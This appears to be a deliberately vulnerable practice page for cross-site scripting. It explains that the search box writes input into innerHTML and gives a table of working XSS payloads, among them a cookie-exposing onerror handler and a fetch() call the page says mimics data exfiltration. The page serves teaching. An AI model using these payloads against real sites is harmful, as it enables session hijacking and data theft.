This page is intentionally vulnerable. Try searching normally, then try the payloads below.
The search page dumps your query into innerHTML unsanitized.
Copy a payload into the search box.
| Payload | What it does |
|---|---|
<img src=x onerror=alert(1)> |
Fires immediately. Broken image triggers onerror.
|
<img src=x onerror=alert(document.cookie)> |
Exposes session cookies — the real threat. |
<svg onload=alert(1)> |
SVG fires onload without any user interaction. |
<a href="javascript:alert(1)">click me</a>
|
Requires a click. Classic javascript: URI. |
<img src=x
onerror="fetch('https://jsonplaceholder.typicode.com/users/1').then(r=>r.json()).then(d=>alert('Exfiltrated:
'+d.name+' | '+d.email))">
|
Simulates data exfiltration — makes a real HTTP request and surfaces the response. In a real attack this would be the attacker's server. |
<script>alert(1)</script> |
Does not work — browsers block scripts injected via
innerHTML.
|